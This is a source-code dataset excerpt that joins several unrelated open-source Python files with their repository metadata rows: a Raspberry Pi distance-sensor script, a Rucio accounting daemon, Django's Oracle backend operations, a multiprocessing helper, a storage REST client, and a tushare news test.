# Allow module to settle
time.sleep(0.5)
# Send 10us pulse to trigger
GPIO.output(pinTrigger, True)
time.sleep(0.00001)
GPIO.output(pinTrigger, False)
# Start the timer
startTime = time.time()
# The start time is reset until the Echo pin is taken high (==1)
while GPIO.input(pinEcho)==0:
startTime = time.time()
# Stop when the Echo pin is no longer high - the end time
while GPIO.input(pinEcho)==1:
stopTime = time.time()
# If the sensor is too close to an object, the Pi cannot # see the echo quickly enough, so it has to detect that # problem and say what has happened
if stopTime-startTime >= 0.04:
print("Hold on there! You're too close for me to see.")
stopTime = startTime
break
# Calculate pulse length
elapsedTime = stopTime - startTime
# Distance pulse travelled in that time is
# time multiplied by the speed of sound (cm/s)
distance = elapsedTime * 34326
# That was the distance there and back so halve the value
distance = distance / 2
return distance
pinTrigger = 17
pinEcho = 18
def init():
# Define GPIO pins to use on the Pi
GPIO.setup(pinTrigger, GPIO.OUT) # Trigger
GPIO.setup(pinEcho, GPIO.IN) # Echo
def runSensor():
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
init()
try:
# Repeat the next indented block forever
while True:
distance = measureDistance()
print("Distance : %.1f" % distance)
time.sleep(0.5)
# If you press CTRL+C, cleanup and stop
except KeyboardInterrupt:
# Reset GPIO settings
GPIO.cleanup()
if __name__ == "__main__":
runSensor()
| 29.825397 | 156 | 0.633316 |
71cc1854d554f041e32d14dda564b549ee70fa0a | 5,225 | py | Python | lib/rucio/daemons/abacus/account.py | llwang00/rucio | f49c5c9599e147823110dc6da22a0bc33a881f8e | [
"Apache-2.0"
] | 1 | 2019-03-15T19:29:35.000Z | 2019-03-15T19:29:35.000Z | lib/rucio/daemons/abacus/account.py | llwang00/rucio | f49c5c9599e147823110dc6da22a0bc33a881f8e | [
"Apache-2.0"
] | 58 | 2020-04-14T09:04:04.000Z | 2021-07-13T15:12:59.000Z | lib/rucio/daemons/abacus/account.py | llwang00/rucio | f49c5c9599e147823110dc6da22a0bc33a881f8e | [
"Apache-2.0"
] | 1 | 2020-03-02T17:18:14.000Z | 2020-03-02T17:18:14.000Z | # -*- coding: utf-8 -*-
# Copyright 2014-2020 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2014-2019
# - Vincent Garonne <vincent.garonne@cern.ch>, 2014-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
"""
Abacus-Account is a daemon to update Account counters.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.config import config_get
from rucio.common.utils import get_thread_with_periodic_running_function
from rucio.core.account_counter import get_updated_account_counters, update_account_counter, fill_account_counter_history_table
from rucio.core.heartbeat import live, die, sanity_check
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def account_update(once=False):
"""
Main loop to check and update the Account Counters.
"""
logging.info('account_update: starting')
logging.info('account_update: started')
# Make an initial heartbeat so that all abacus-account daemons have the correct worker number on the next try
executable = 'abacus-account'
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
while not graceful_stop.is_set():
try:
# Heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
# Select a bunch of rses for to update for this worker
start = time.time() # NOQA
account_rse_ids = get_updated_account_counters(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'])
logging.debug('Index query time %f size=%d' % (time.time() - start, len(account_rse_ids)))
# If the list is empty, sent the worker to sleep
if not account_rse_ids and not once:
logging.info('account_update[%s/%s] did not get any work' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1))
time.sleep(10)
else:
for account_rse_id in account_rse_ids:
if graceful_stop.is_set():
break
start_time = time.time()
update_account_counter(account=account_rse_id[0], rse_id=account_rse_id[1])
logging.debug('account_update[%s/%s]: update of account-rse counter "%s-%s" took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, account_rse_id[0], account_rse_id[1], time.time() - start_time))
except Exception:
logging.error(traceback.format_exc())
if once:
break
logging.info('account_update: graceful stop requested')
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
logging.info('account_update: graceful stop done')
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, fill_history_table=False):
"""
Starts up the Abacus-Account threads.
"""
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
executable = 'abacus-account'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
logging.info('main: executing one iteration only')
account_update(once)
else:
logging.info('main: starting threads')
threads = [threading.Thread(target=account_update, kwargs={'once': once}) for i in range(0, threads)]
if fill_history_table:
threads.append(get_thread_with_periodic_running_function(3600, fill_account_counter_history_table, graceful_stop))
[t.start() for t in threads]
logging.info('main: waiting for interrupts')
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
| 38.992537 | 229 | 0.664306 |
fa29a8925ac91dbf3a54e39424f6e7500d1afc20 | 24,223 | py | Python | django/db/backends/oracle/operations.py | sergeykolosov/django | 03049fb8d96ccd1f1ed0285486103542de42faba | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/db/backends/oracle/operations.py | sergeykolosov/django | 03049fb8d96ccd1f1ed0285486103542de42faba | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/db/backends/oracle/operations.py | sergeykolosov/django | 03049fb8d96ccd1f1ed0285486103542de42faba | [
"PSF-2.0",
"BSD-3-Clause"
] | 1 | 2021-05-10T10:16:03.000Z | 2021-05-10T10:16:03.000Z | import datetime
import re
import uuid
from django.conf import settings
from django.db.backends.base.operations import BaseDatabaseOperations
from django.db.backends.utils import strip_quotes, truncate_name
from django.utils import timezone
from django.utils.encoding import force_bytes
from .base import Database
from .utils import BulkInsertMapper, InsertIdVar, Oracle_datetime
class DatabaseOperations(BaseDatabaseOperations):
# Oracle uses NUMBER(11) and NUMBER(19) for integer fields.
integer_field_ranges = {
'SmallIntegerField': (-99999999999, 99999999999),
'IntegerField': (-99999999999, 99999999999),
'BigIntegerField': (-9999999999999999999, 9999999999999999999),
'PositiveSmallIntegerField': (0, 99999999999),
'PositiveIntegerField': (0, 99999999999),
}
set_operators = dict(BaseDatabaseOperations.set_operators, difference='MINUS')
# TODO: colorize this SQL code with style.SQL_KEYWORD(), etc.
_sequence_reset_sql = """
DECLARE
table_value integer;
seq_value integer;
seq_name user_tab_identity_cols.sequence_name%%TYPE;
BEGIN
BEGIN
SELECT sequence_name INTO seq_name FROM user_tab_identity_cols
WHERE table_name = '%(table_name)s' AND
column_name = '%(column_name)s';
EXCEPTION WHEN NO_DATA_FOUND THEN
seq_name := '%(no_autofield_sequence_name)s';
END;
SELECT NVL(MAX(%(column)s), 0) INTO table_value FROM %(table)s;
SELECT NVL(last_number - cache_size, 0) INTO seq_value FROM user_sequences
WHERE sequence_name = seq_name;
WHILE table_value > seq_value LOOP
EXECUTE IMMEDIATE 'SELECT "'||seq_name||'".nextval FROM DUAL'
INTO seq_value;
END LOOP;
END;
/"""
# Oracle doesn't support string without precision; use the max string size.
cast_char_field_without_max_length = 'NVARCHAR2(2000)'
def cache_key_culling_sql(self):
return """
SELECT cache_key
FROM (SELECT cache_key, rank() OVER (ORDER BY cache_key) AS rank FROM %s)
WHERE rank = %%s + 1
"""
def date_extract_sql(self, lookup_type, field_name):
if lookup_type == 'week_day':
# TO_CHAR(field, 'D') returns an integer from 1-7, where 1=Sunday.
return "TO_CHAR(%s, 'D')" % field_name
elif lookup_type == 'week':
# IW = ISO week number
return "TO_CHAR(%s, 'IW')" % field_name
elif lookup_type == 'quarter':
return "TO_CHAR(%s, 'Q')" % field_name
else:
# https://docs.oracle.com/database/121/SQLRF/functions067.htm#SQLRF00639
return "EXTRACT(%s FROM %s)" % (lookup_type.upper(), field_name)
def date_interval_sql(self, timedelta):
"""
NUMTODSINTERVAL converts number to INTERVAL DAY TO SECOND literal.
"""
return "NUMTODSINTERVAL(%06f, 'SECOND')" % timedelta.total_seconds()
def date_trunc_sql(self, lookup_type, field_name):
# https://docs.oracle.com/database/121/SQLRF/functions271.htm#SQLRF52058
if lookup_type in ('year', 'month'):
return "TRUNC(%s, '%s')" % (field_name, lookup_type.upper())
elif lookup_type == 'quarter':
return "TRUNC(%s, 'Q')" % field_name
else:
return "TRUNC(%s)" % field_name
# Oracle crashes with "ORA-03113: end-of-file on communication channel"
# if the time zone name is passed in parameter. Use interpolation instead.
# https://groups.google.com/forum/#!msg/django-developers/zwQju7hbG78/9l934yelwfsJ
# This regexp matches all time zone names from the zoneinfo database.
_tzname_re = re.compile(r'^[\w/:+-]+$')
def _convert_field_to_tz(self, field_name, tzname):
if not settings.USE_TZ:
return field_name
if not self._tzname_re.match(tzname):
raise ValueError("Invalid time zone name: %s" % tzname)
# Convert from UTC to local time, returning TIMESTAMP WITH TIME ZONE
# and cast it back to TIMESTAMP to strip the TIME ZONE details.
return "CAST((FROM_TZ(%s, '0:00') AT TIME ZONE '%s') AS TIMESTAMP)" % (field_name, tzname)
def datetime_cast_date_sql(self, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
return 'TRUNC(%s)' % field_name
def datetime_cast_time_sql(self, field_name, tzname):
# Since `TimeField` values are stored as TIMESTAMP where only the date
# part is ignored, convert the field to the specified timezone.
return self._convert_field_to_tz(field_name, tzname)
def datetime_extract_sql(self, lookup_type, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
return self.date_extract_sql(lookup_type, field_name)
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
# https://docs.oracle.com/database/121/SQLRF/functions271.htm#SQLRF52058
if lookup_type in ('year', 'month'):
sql = "TRUNC(%s, '%s')" % (field_name, lookup_type.upper())
elif lookup_type == 'quarter':
sql = "TRUNC(%s, 'Q')" % field_name
elif lookup_type == 'day':
sql = "TRUNC(%s)" % field_name
elif lookup_type == 'hour':
sql = "TRUNC(%s, 'HH24')" % field_name
elif lookup_type == 'minute':
sql = "TRUNC(%s, 'MI')" % field_name
else:
sql = "CAST(%s AS DATE)" % field_name # Cast to DATE removes sub-second precision.
return sql
def time_trunc_sql(self, lookup_type, field_name):
# The implementation is similar to `datetime_trunc_sql` as both
# `DateTimeField` and `TimeField` are stored as TIMESTAMP where
# the date part of the later is ignored.
if lookup_type == 'hour':
sql = "TRUNC(%s, 'HH24')" % field_name
elif lookup_type == 'minute':
sql = "TRUNC(%s, 'MI')" % field_name
elif lookup_type == 'second':
sql = "CAST(%s AS DATE)" % field_name # Cast to DATE removes sub-second precision.
return sql
def get_db_converters(self, expression):
converters = super().get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
if internal_type == 'TextField':
converters.append(self.convert_textfield_value)
elif internal_type == 'BinaryField':
converters.append(self.convert_binaryfield_value)
elif internal_type in ['BooleanField', 'NullBooleanField']:
converters.append(self.convert_booleanfield_value)
elif internal_type == 'DateTimeField':
converters.append(self.convert_datetimefield_value)
elif internal_type == 'DateField':
converters.append(self.convert_datefield_value)
elif internal_type == 'TimeField':
converters.append(self.convert_timefield_value)
elif internal_type == 'UUIDField':
converters.append(self.convert_uuidfield_value)
# Oracle stores empty strings as null. If the field accepts the empty
# string, undo this to adhere to the Django convention of using
# the empty string instead of null.
if expression.field.empty_strings_allowed:
converters.append(
self.convert_empty_bytes
if internal_type == 'BinaryField' else
self.convert_empty_string
)
return converters
def convert_textfield_value(self, value, expression, connection):
if isinstance(value, Database.LOB):
value = value.read()
return value
def convert_binaryfield_value(self, value, expression, connection):
if isinstance(value, Database.LOB):
value = force_bytes(value.read())
return value
def convert_booleanfield_value(self, value, expression, connection):
if value in (0, 1):
value = bool(value)
return value
# cx_Oracle always returns datetime.datetime objects for
# DATE and TIMESTAMP columns, but Django wants to see a
# python datetime.date, .time, or .datetime.
def convert_datetimefield_value(self, value, expression, connection):
if value is not None:
if settings.USE_TZ:
value = timezone.make_aware(value, self.connection.timezone)
return value
def convert_datefield_value(self, value, expression, connection):
if isinstance(value, Database.Timestamp):
value = value.date()
return value
def convert_timefield_value(self, value, expression, connection):
if isinstance(value, Database.Timestamp):
value = value.time()
return value
def convert_uuidfield_value(self, value, expression, connection):
if value is not None:
value = uuid.UUID(value)
return value
@staticmethod
def convert_empty_string(value, expression, connection):
return '' if value is None else value
@staticmethod
def convert_empty_bytes(value, expression, connection):
return b'' if value is None else value
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def fetch_returned_insert_id(self, cursor):
return int(cursor._insert_id_var.getvalue())
def field_cast_sql(self, db_type, internal_type):
if db_type and db_type.endswith('LOB'):
return "DBMS_LOB.SUBSTR(%s)"
else:
return "%s"
def no_limit_value(self):
return None
def limit_offset_sql(self, low_mark, high_mark):
fetch, offset = self._get_limit_offset_params(low_mark, high_mark)
return '%s%s' % (
(' OFFSET %d ROWS' % offset) if offset else '',
(' FETCH FIRST %d ROWS ONLY' % fetch) if fetch else '',
)
def last_executed_query(self, cursor, sql, params):
# https://cx-oracle.readthedocs.io/en/latest/cursor.html#Cursor.statement
# The DB API definition does not define this attribute.
statement = cursor.statement
# Unlike Psycopg's `query` and MySQLdb`'s `_last_executed`, CxOracle's
# `statement` doesn't contain the query parameters. refs #20010.
return super().last_executed_query(cursor, statement, params)
def last_insert_id(self, cursor, table_name, pk_name):
sq_name = self._get_sequence_name(cursor, strip_quotes(table_name), pk_name)
cursor.execute('"%s".currval' % sq_name)
return cursor.fetchone()[0]
def lookup_cast(self, lookup_type, internal_type=None):
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
return "UPPER(%s)"
return "%s"
def max_in_list_size(self):
return 1000
def max_name_length(self):
return 30
def pk_default_value(self):
return "NULL"
def prep_for_iexact_query(self, x):
return x
def process_clob(self, value):
if value is None:
return ''
return value.read()
def quote_name(self, name):
# SQL92 requires delimited (quoted) names to be case-sensitive. When
# not quoted, Oracle has case-insensitive behavior for identifiers, but
# always defaults to uppercase.
# We simplify things by making Oracle identifiers always uppercase.
if not name.startswith('"') and not name.endswith('"'):
name = '"%s"' % truncate_name(name.upper(), self.max_name_length())
# Oracle puts the query text into a (query % args) construct, so % signs
# in names need to be escaped. The '%%' will be collapsed back to '%' at
# that stage so we aren't really making the name longer here.
name = name.replace('%', '%%')
return name.upper()
def random_function_sql(self):
return "DBMS_RANDOM.RANDOM"
def regex_lookup(self, lookup_type):
if lookup_type == 'regex':
match_option = "'c'"
else:
match_option = "'i'"
return 'REGEXP_LIKE(%%s, %%s, %s)' % match_option
def return_insert_id(self):
return "RETURNING %s INTO %%s", (InsertIdVar(),)
def savepoint_create_sql(self, sid):
return "SAVEPOINT " + self.quote_name(sid)
def savepoint_rollback_sql(self, sid):
return "ROLLBACK TO SAVEPOINT " + self.quote_name(sid)
def _foreign_key_constraints(self, table_name, recursive=False):
with self.connection.cursor() as cursor:
if recursive:
cursor.execute("""
SELECT
user_tables.table_name, rcons.constraint_name
FROM
user_tables
JOIN
user_constraints cons
ON (user_tables.table_name = cons.table_name AND cons.constraint_type = ANY('P', 'U'))
LEFT JOIN
user_constraints rcons
ON (user_tables.table_name = rcons.table_name AND rcons.constraint_type = 'R')
START WITH user_tables.table_name = UPPER(%s)
CONNECT BY NOCYCLE PRIOR cons.constraint_name = rcons.r_constraint_name
GROUP BY
user_tables.table_name, rcons.constraint_name
HAVING user_tables.table_name != UPPER(%s)
ORDER BY MAX(level) DESC
""", (table_name, table_name))
else:
cursor.execute("""
SELECT
cons.table_name, cons.constraint_name
FROM
user_constraints cons
WHERE
cons.constraint_type = 'R'
AND cons.table_name = UPPER(%s)
""", (table_name,))
return cursor.fetchall()
def sql_flush(self, style, tables, sequences, allow_cascade=False):
if tables:
truncated_tables = {table.upper() for table in tables}
constraints = set()
# Oracle's TRUNCATE CASCADE only works with ON DELETE CASCADE
# foreign keys which Django doesn't define. Emulate the
# PostgreSQL behavior which truncates all dependent tables by
# manually retrieving all foreign key constraints and resolving
# dependencies.
for table in tables:
for foreign_table, constraint in self._foreign_key_constraints(table, recursive=allow_cascade):
if allow_cascade:
truncated_tables.add(foreign_table)
constraints.add((foreign_table, constraint))
sql = [
"%s %s %s %s %s %s %s %s;" % (
style.SQL_KEYWORD('ALTER'),
style.SQL_KEYWORD('TABLE'),
style.SQL_FIELD(self.quote_name(table)),
style.SQL_KEYWORD('DISABLE'),
style.SQL_KEYWORD('CONSTRAINT'),
style.SQL_FIELD(self.quote_name(constraint)),
style.SQL_KEYWORD('KEEP'),
style.SQL_KEYWORD('INDEX'),
) for table, constraint in constraints
] + [
"%s %s %s;" % (
style.SQL_KEYWORD('TRUNCATE'),
style.SQL_KEYWORD('TABLE'),
style.SQL_FIELD(self.quote_name(table)),
) for table in truncated_tables
] + [
"%s %s %s %s %s %s;" % (
style.SQL_KEYWORD('ALTER'),
style.SQL_KEYWORD('TABLE'),
style.SQL_FIELD(self.quote_name(table)),
style.SQL_KEYWORD('ENABLE'),
style.SQL_KEYWORD('CONSTRAINT'),
style.SQL_FIELD(self.quote_name(constraint)),
) for table, constraint in constraints
]
# Since we've just deleted all the rows, running our sequence
# ALTER code will reset the sequence to 0.
sql.extend(self.sequence_reset_by_name_sql(style, sequences))
return sql
else:
return []
def sequence_reset_by_name_sql(self, style, sequences):
sql = []
for sequence_info in sequences:
no_autofield_sequence_name = self._get_no_autofield_sequence_name(sequence_info['table'])
table = self.quote_name(sequence_info['table'])
column = self.quote_name(sequence_info['column'] or 'id')
query = self._sequence_reset_sql % {
'no_autofield_sequence_name': no_autofield_sequence_name,
'table': table,
'column': column,
'table_name': strip_quotes(table),
'column_name': strip_quotes(column),
}
sql.append(query)
return sql
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
query = self._sequence_reset_sql
for model in model_list:
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
no_autofield_sequence_name = self._get_no_autofield_sequence_name(model._meta.db_table)
table = self.quote_name(model._meta.db_table)
column = self.quote_name(f.column)
output.append(query % {
'no_autofield_sequence_name': no_autofield_sequence_name,
'table': table,
'column': column,
'table_name': strip_quotes(table),
'column_name': strip_quotes(column),
})
# Only one AutoField is allowed per model, so don't
# continue to loop
break
for f in model._meta.many_to_many:
if not f.remote_field.through:
no_autofield_sequence_name = self._get_no_autofield_sequence_name(f.m2m_db_table())
table = self.quote_name(f.m2m_db_table())
column = self.quote_name('id')
output.append(query % {
'no_autofield_sequence_name': no_autofield_sequence_name,
'table': table,
'column': column,
'table_name': strip_quotes(table),
'column_name': 'ID',
})
return output
def start_transaction_sql(self):
return ''
def tablespace_sql(self, tablespace, inline=False):
if inline:
return "USING INDEX TABLESPACE %s" % self.quote_name(tablespace)
else:
return "TABLESPACE %s" % self.quote_name(tablespace)
def adapt_datefield_value(self, value):
"""
Transform a date value to an object compatible with what is expected
by the backend driver for date columns.
The default implementation transforms the date to text, but that is not
necessary for Oracle.
"""
return value
def adapt_datetimefield_value(self, value):
"""
Transform a datetime value to an object compatible with what is expected
by the backend driver for datetime columns.
If naive datetime is passed assumes that is in UTC. Normally Django
models.DateTimeField makes sure that if USE_TZ is True passed datetime
is timezone aware.
"""
if value is None:
return None
# Expression values are adapted by the database.
if hasattr(value, 'resolve_expression'):
return value
# cx_Oracle doesn't support tz-aware datetimes
if timezone.is_aware(value):
if settings.USE_TZ:
value = timezone.make_naive(value, self.connection.timezone)
else:
raise ValueError("Oracle backend does not support timezone-aware datetimes when USE_TZ is False.")
return Oracle_datetime.from_datetime(value)
def adapt_timefield_value(self, value):
if value is None:
return None
# Expression values are adapted by the database.
if hasattr(value, 'resolve_expression'):
return value
if isinstance(value, str):
return datetime.datetime.strptime(value, '%H:%M:%S')
# Oracle doesn't support tz-aware times
if timezone.is_aware(value):
raise ValueError("Oracle backend does not support timezone-aware times.")
return Oracle_datetime(1900, 1, 1, value.hour, value.minute,
value.second, value.microsecond)
def combine_expression(self, connector, sub_expressions):
lhs, rhs = sub_expressions
if connector == '%%':
return 'MOD(%s)' % ','.join(sub_expressions)
elif connector == '&':
return 'BITAND(%s)' % ','.join(sub_expressions)
elif connector == '|':
return 'BITAND(-%(lhs)s-1,%(rhs)s)+%(lhs)s' % {'lhs': lhs, 'rhs': rhs}
elif connector == '<<':
return '(%(lhs)s * POWER(2, %(rhs)s))' % {'lhs': lhs, 'rhs': rhs}
elif connector == '>>':
return 'FLOOR(%(lhs)s / POWER(2, %(rhs)s))' % {'lhs': lhs, 'rhs': rhs}
elif connector == '^':
return 'POWER(%s)' % ','.join(sub_expressions)
return super().combine_expression(connector, sub_expressions)
def _get_no_autofield_sequence_name(self, table):
"""
Manually created sequence name to keep backward compatibility for
AutoFields that aren't Oracle identity columns.
"""
name_length = self.max_name_length() - 3
return '%s_SQ' % truncate_name(strip_quotes(table), name_length).upper()
def _get_sequence_name(self, cursor, table, pk_name):
cursor.execute("""
SELECT sequence_name
FROM user_tab_identity_cols
WHERE table_name = UPPER(%s)
AND column_name = UPPER(%s)""", [table, pk_name])
row = cursor.fetchone()
return self._get_no_autofield_sequence_name(table) if row is None else row[0]
def bulk_insert_sql(self, fields, placeholder_rows):
query = []
for row in placeholder_rows:
select = []
for i, placeholder in enumerate(row):
# A model without any fields has fields=[None].
if fields[i]:
internal_type = getattr(fields[i], 'target_field', fields[i]).get_internal_type()
placeholder = BulkInsertMapper.types.get(internal_type, '%s') % placeholder
# Add columns aliases to the first select to avoid "ORA-00918:
# column ambiguously defined" when two or more columns in the
# first select have the same value.
if not query:
placeholder = '%s col_%s' % (placeholder, i)
select.append(placeholder)
query.append('SELECT %s FROM DUAL' % ', '.join(select))
# Bulk insert to tables with Oracle identity columns causes Oracle to
# add sequence.nextval to it. Sequence.nextval cannot be used with the
# UNION operator. To prevent incorrect SQL, move UNION to a subquery.
return 'SELECT * FROM (%s)' % ' UNION ALL '.join(query)
def subtract_temporals(self, internal_type, lhs, rhs):
if internal_type == 'DateField':
lhs_sql, lhs_params = lhs
rhs_sql, rhs_params = rhs
return "NUMTODSINTERVAL(%s - %s, 'DAY')" % (lhs_sql, rhs_sql), lhs_params + rhs_params
return super().subtract_temporals(internal_type, lhs, rhs)
def bulk_batch_size(self, fields, objs):
"""Oracle restricts the number of parameters in a query."""
if fields:
return self.connection.features.max_query_params // len(fields)
return len(objs)
| 42.496491 | 114 | 0.604467 |
83d5dfd794584f53604636f4890915dd10f0932b | 700 | py | Python | ocean/{{projectNameShort}}/{{projectNameShort}}/parallel.py | surfstudio/ocean | 99c036c7cbcd4f0fe496bb72acdc54db8adb637a | [
"MIT"
] | 17 | 2019-07-09T12:46:17.000Z | 2021-05-24T08:24:27.000Z | ocean/{{projectNameShort}}/{{projectNameShort}}/parallel.py | EnlightenedCSF/Ocean | 99c036c7cbcd4f0fe496bb72acdc54db8adb637a | [
"MIT"
] | 2 | 2019-07-11T09:06:49.000Z | 2019-07-11T09:33:38.000Z | ocean/{{projectNameShort}}/{{projectNameShort}}/parallel.py | EnlightenedCSF/Ocean | 99c036c7cbcd4f0fe496bb72acdc54db8adb637a | [
"MIT"
] | 4 | 2019-07-25T07:43:56.000Z | 2020-02-18T19:32:57.000Z | from multiprocessing import Pool, cpu_count
import numpy as np
def parallelize(data, func, n_threads: int = None) -> np.array:
"""
**Applies function to an array in multithreads**
:param data: np.array or pd.Series of data.
:param func: function to apply on batches. Input param of the func is array's part.
:param n_threads: number of parallel threads.
"""
if n_threads is None:
partitions = cores = cpu_count()
else:
partitions = cores = n_threads
data_split = np.array_split(data, partitions)
pool = Pool(cores)
data = np.concatenate(list(pool.imap(func, data_split)))
pool.close()
pool.join()
return data
| 30.434783 | 91 | 0.654286 |
80b79420810409c42bf80ae0dbea638ae9434297 | 4,276 | py | Python | delfin/drivers/utils/rest_client.py | niteesh1215/delfin | 89cb0e9ee2b673dcca09e1d4754c45eef3fa46a0 | [
"Apache-2.0"
] | 1 | 2021-12-14T06:42:00.000Z | 2021-12-14T06:42:00.000Z | delfin/drivers/utils/rest_client.py | niteesh1215/delfin | 89cb0e9ee2b673dcca09e1d4754c45eef3fa46a0 | [
"Apache-2.0"
] | null | null | null | delfin/drivers/utils/rest_client.py | niteesh1215/delfin | 89cb0e9ee2b673dcca09e1d4754c45eef3fa46a0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The SODA Authors.
# Copyright (c) 2016 Huawei Technologies Co., Ltd.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import requests
import six
from oslo_log import log as logging
from delfin import exception
from delfin import ssl_utils
from delfin.drivers.hpe.hpe_3par import consts
from delfin.i18n import _
LOG = logging.getLogger(__name__)
class RestClient(object):
def __init__(self, **kwargs):
rest_access = kwargs.get('rest')
if rest_access is None:
raise exception.InvalidInput('Input rest_access is missing')
self.rest_host = rest_access.get('host')
self.rest_port = rest_access.get('port')
self.rest_username = rest_access.get('username')
self.rest_password = rest_access.get('password')
self.san_address = 'https://%s:%s' % \
(self.rest_host, str(self.rest_port))
self.session = None
self.device_id = None
self.verify = kwargs.get('verify', False)
self.rest_auth_token = None
def init_http_head(self):
if self.session:
self.session.close()
self.session = requests.Session()
self.session.headers.update({
"Connection": "keep-alive",
'Accept': 'application/json',
"Content-Type": "application/json"})
if not self.verify:
self.session.verify = False
else:
LOG.debug("Enable certificate verification, ca_path: {0}".format(
self.verify))
self.session.verify = self.verify
self.session.trust_env = False
self.session.mount("https://",
ssl_utils.get_host_name_ignore_adapter())
def do_call(self, url, data, method,
calltimeout=consts.SOCKET_TIMEOUT):
if 'http' not in url:
if self.san_address:
url = '%s%s' % (self.san_address, url)
kwargs = {'timeout': calltimeout}
if data:
kwargs['data'] = json.dumps(data)
if method in ('POST', 'PUT', 'GET', 'DELETE'):
func = getattr(self.session, method.lower())
else:
msg = _("Request method %s is invalid.") % method
LOG.error(msg)
raise exception.StorageBackendException(msg)
res = None
try:
res = func(url, **kwargs)
except requests.exceptions.ConnectTimeout as ct:
LOG.error('Connect Timeout err: {}'.format(ct))
raise exception.InvalidIpOrPort()
except requests.exceptions.ReadTimeout as rt:
LOG.error('Read timed out err: {}'.format(rt))
raise exception.StorageBackendException(six.text_type(rt))
except requests.exceptions.SSLError as e:
LOG.error('SSLError for %s %s' % (method, url))
err_str = six.text_type(e)
if 'certificate verify failed' in err_str:
raise exception.SSLCertificateFailed()
else:
raise exception.SSLHandshakeFailed()
except Exception as err:
LOG.exception('Bad response from server: %(url)s.'
' Error: %(err)s', {'url': url, 'err': err})
if 'WSAETIMEDOUT' in str(err):
raise exception.ConnectTimeout()
elif 'Failed to establish a new connection' in str(err):
LOG.error('Failed to establish: {}'.format(err))
raise exception.InvalidIpOrPort()
elif 'Read timed out' in str(err):
raise exception.StorageBackendException(six.text_type(err))
else:
raise exception.BadResponse()
return res
| 37.840708 | 78 | 0.605239 |
3c7d9b078f6d5942f2304e245df84aa5785a5ced | 840 | py | Python | test/news_test.py | hu00xp/tushare | 3bd28bad1a3445ac5f9fe2b0d1647dbd3114ed28 | [
"BSD-3-Clause"
] | 20 | 2017-11-23T12:18:28.000Z | 2021-03-15T15:15:56.000Z | test/news_test.py | boblee2000/tushare | 3bd28bad1a3445ac5f9fe2b0d1647dbd3114ed28 | [
"BSD-3-Clause"
] | 1 | 2021-12-13T20:52:05.000Z | 2021-12-13T20:52:05.000Z | test/news_test.py | boblee2000/tushare | 3bd28bad1a3445ac5f9fe2b0d1647dbd3114ed28 | [
"BSD-3-Clause"
] | 12 | 2017-11-21T01:39:47.000Z | 2021-03-15T15:15:57.000Z | # -*- coding:utf-8 -*-
'''
Created on 2015/3/14
@author: Jimmy Liu
'''
import unittest
import tushare.stock.newsevent as fd
class Test(unittest.TestCase):
def set_data(self):
self.code = '600848'
self.start = '2015-01-03'
self.end = '2015-04-07'
self.year = 2014
self.quarter = 4
self.top = 60
self.show_content = True
def test_get_latest_news(self):
self.set_data()
print(fd.get_latest_news(self.top, self.show_content))
def test_get_notices(self):
self.set_data()
df = fd.get_notices(self.code)
print(fd.notice_content(df.ix[0]['url']))
def test_guba_sina(self):
self.set_data()
print(fd.guba_sina(self.show_content))
if __name__ == "__main__":
unittest.main() | 24 | 63 | 0.583333 |
43ebbbeb3e772cce8ecc0fb4c6b7945acfc42285 | 1,924 | py | Python | src/eyeson/translators.py | sapporojones/eyeson | 129c3bda4c0bdf562aab4d8072a20c667ff9b4b3 | [
"MIT"
] | null | null | null | src/eyeson/translators.py | sapporojones/eyeson | 129c3bda4c0bdf562aab4d8072a20c667ff9b4b3 | [
"MIT"
